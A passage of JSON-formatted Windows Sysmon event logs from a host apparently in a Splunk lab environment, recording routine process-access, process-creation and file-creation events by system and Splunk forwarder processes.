08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6797,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6798,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6799,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6800,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.398\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2219-5F25-0000-001033E90A00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.398","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2219-5F25-0000-001033E90A00}","TargetProcessId":"1328","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6801,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:41.539\r\nSourceProcessGUID: {41C8662E-2219-5F25-0000-001033E90A00}\r\nSourceProcessId: 1328\r\nSourceThreadId: 3536\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:41.539","SourceProcessGUID":"{41C8662E-2219-5F25-0000-001033E90A00}","SourceProcessId":"1328","SourceThreadId":"3536","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6802,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:41.929\r\nProcessGuid: {41C8662E-220F-5F25-0000-00100AE00A00}\r\nProcessId: 4916\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1334-0\\PresentationCore.dll\r\nCreationUtcTime: 2020-08-01 08:04:41.929","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:41.929","ProcessGuid":"{41C8662E-220F-5F25-0000-00100AE00A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1334-0\\PresentationCore.dll","CreationUtcTime":"2020-08-01 08:04:41.929","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6803,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nProcessGuid: {41C8662E-221A-5F25-0000-00108FEB0A00}\r\nProcessId: 4152\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","ProcessGuid":"{41C8662E-221A-5F25-0000-00108FEB0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6804,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-221A-5F25-0000-00108FEB0A00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-221A-5F25-0000-00108FEB0A00}","TargetProcessId":"4152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6805,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:42.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-221A-5F25-0000-00108FEB0A00}\r\nTargetProcessId: 4152\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:42.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-221A-5F25-0000-00108FEB0A00}","TargetProcessId":"4152","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
